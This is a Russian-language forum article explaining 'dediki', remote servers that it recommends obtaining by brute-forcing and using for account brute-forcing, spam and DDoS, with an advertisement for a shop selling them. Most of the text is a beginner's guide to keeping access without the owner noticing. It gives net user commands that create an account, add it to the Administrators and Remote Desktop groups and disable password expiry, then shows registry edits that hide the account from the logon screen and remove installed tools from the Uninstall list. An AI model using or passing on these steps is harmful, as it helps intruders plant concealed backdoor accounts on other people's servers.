Дедик

Автор: KIM    Просмотров: 1109   Комментариев: 0   Дата: 15-11-2020, 20:20

Дедик

Что такое дедик и как пользоваться им ?


В этой статье мы разберём что такое дедик и некоторые тонкости при его использовании. И так, что же такое дедик?

Дедик - пошло от английского слова "dedicated",что означает выделенный. Полное название - "Dedicated Server", что означает выделенный сервер. Служат они для обработки данных, хранения различного материала, и т.д. Дедик это удалённый сервер (компьютер), который включен 24 часа в сутки. Так же они имеют довольно таки мощные сетевые интерфейсы, и аппаратную конфигурацию.
Купить дедик отличного качества вы можете здесь dedic.store.
Для чего же их применяют? В чём они полезны?

Применяют их например для брута, спама, флуда, ддоса. В общем,для всех тех операций которые требуют продолжительного включенного компьютера и его нагрузки.

Приведу пример:

Тебе очень захотелось брутить ВК страницы, но ты не желаешь этого делать на своем компьютере, так как придётся жертвовать оставляя включенный компьютер на много времени, и твой комп не на столько мощный, а брут будет очень сильно его нагружать, да и канал у тебя не из мощных. Что же делать?

Правильно, для этого есть дедик, зашел на дедик, залил всё нужное на него, поставил брутить, вышел из дедика,выключил комп, а сам пошел поспать или погулять, Потом вернулся, включил комп, зашел на дедик, забрал удачно сбрученные аськи, и все дела!
Удобно не правда ли? Вот этим дедики и полезны.

Как подключится к дедику?

С дедиками обычно работают через службу удалённого рабочего стола (3899 порт). Для того чтобы подключится к удалённому рабочему столу нужно зайти в "Пуск > Программы > Стандартные > Связь > Подключение к удаленному рабочему столу". Или же просто нажать "Пуск > Выполнить > mstsc". В появившимся окне нужно вписать IP дедика и нажать подключится. При подключении нас попросят ввести логин и пароль.

Как добыть дедик?

Есть 3 варианта:

1-Купить
2-Выпрашивать в халяве
3-Сбрутить

Поскольку первые 2 варианта нам не очень подходят,то остаётся только вариант под номером 3,который мы рассмотрим чуть позже.

А долго ли прослужит мне дедик?

Всё зависит от твоей аккуратности и глаз админа. Если ты будешь находится на дедике соблюдая несколько правил,то он тебе прослужит довольно таки долго. Но если же эти правила не соблюдаются, то твой дедик быстро прикроет админ.
Давайте рассмотрим несколько пунктов о правилах поведения на дедике:

-Не удаляй ничего из того что тебе не принадлежит
-Старайся без нужды не лезть к чужим учётным записям и взламывать их
-Не храни никаких документов на рабочем столе,храни всё в скрытой папке в "C:\Windows" и глубже
-Сильно не нагружай дедик

Если будешь делать всё так как описано выше, то дедик будет тебе служить долго.

Как залить файлы на дедик?

Изначально на своём компьютере запакуй весь нужный софт в один архив, и залей его на файлообменник , Скопируй ссылку для скачивания, заходи на дедик, запускай там браузер, переходи по ссылке для скачивания, и скачивай свой софт на дедик.

Ну вот, вы узнали о том что такое дедик, как себя на нём вести, теперь смело перейдём к следующему пункту.


Как маскировать на дедике ?
Как мы все с вами знаем,злой "дядя админ" тоже не спит,так что нужно скрывать своё прибывание на дедике если хотим сохранить его.Сейчас я вам расскажу о том как скрыться от админа.На самом деле всё проще паренный репы,но просто некоторым это делать лень,и на этом они и прокалываются.

И так, мы зашли на дедик,что дальше?

Для начало нам нужно создать свою учётную запись,так как если мы будем проделывать все свои чёрные дела под учёткой админа,то плакал наш дедик как только прийдёт админ и увидит что творится в его учётке.

Создавать учётку мы будем через командную строку, так как это быстрее и удобнее. И так, приступим к созданию учётки:

Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней следующее:

net user Имя_пользователя пароль /add
net localgroup Administrators Имя_пользователя /add
net localgroup "Remote Desktop Users" Имя_пользователя /add
net accounts /maxpwage:unlimited

Теперь давайте разберём каждую команду:

-net user Имя_пользователя пароль /add - Добавляет нового пользователя с указанным именем и паролем

-net localgroup Administrators Имя_пользователя /add - Добавляет нужного пользователя к группе администраторов

-net localgroup "Remote Desktop Users" Имя_пользователя /add - Добавляет нужного пользователя к группе удалённых пользоваелей

-net accounts /maxpwage:unlimited - позволяет избежать истечения срока действия пароля (14 дней)

Например если ты хочешь создать учётку с именем "user" и паролем "password", то команды будут выглядеть так:

net user user password /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited

Отлично, учётка создана. Теперь нам нужно её скрыть из винлогона, чтобы твоя учётка не светилась среди других пользователей.

Для этого заходим в реестр (Пуск > Выполнить > regedit.exe) переходим в "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList" и создаём там новый параметр DWORD (правой кнопкой мыши, новый параметр DWORD) Называем этот параметр именем твоего аккаунта, и присваиваем ему численное значение 0(Цифр).

Далее идём в "C:\Documents and Settings" и скрываем там папку со своим ак-ом со всеми подкаталогами и файлами. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)

И ещё создай себе папку в "C:/WINDOWS/system32" или же глубже,и тоже сделай её скрытой со всеми файлами папками и подкаталогами.Она тебе будет нужна для того чтобы хранить там все нужные тебе файлы.

Всё, теперь у тебя есть скрытая учётка на дедике и папка, куда ты будешь пихать всё своё добро. Можешь смело дисконектится от дедика и заходить под своей учёткой.


Установили прогу на дедике,как её скрыть?

Советуется на дедик ничего не инсталлировать, а лить всё в установленном виде. Но если же тебе всё таки взбрело в голову заинсталить прогу на деде, то чтобы не было лишних проблем, нужно скрыть её из Add or Remove programms (Установка и удаление программ).

Это делается тоже очень просто. Запускаем реестер(RegEdit.exe), идём в "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", там ищем название программы которую установили,и стираем все данные о проге. После этого нашу прогу видно не будет.



Ну вот вроде и всё о маскировке, всё о чём должен знать новичок. Теорию ты освоил, пора перейти к практике.

Комментарии:

Имя:*
E-Mail:
Введите два слова, показанных на изображении: *
Футбольные Евролиги 2014/2015